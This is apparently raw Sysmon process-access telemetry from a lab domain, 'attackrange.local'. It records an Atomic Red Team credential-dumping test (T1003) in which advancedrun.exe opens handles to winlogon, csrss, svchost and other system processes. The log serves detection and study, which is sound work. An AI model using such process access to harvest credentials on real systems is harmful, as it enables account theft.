17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003980180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003980175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
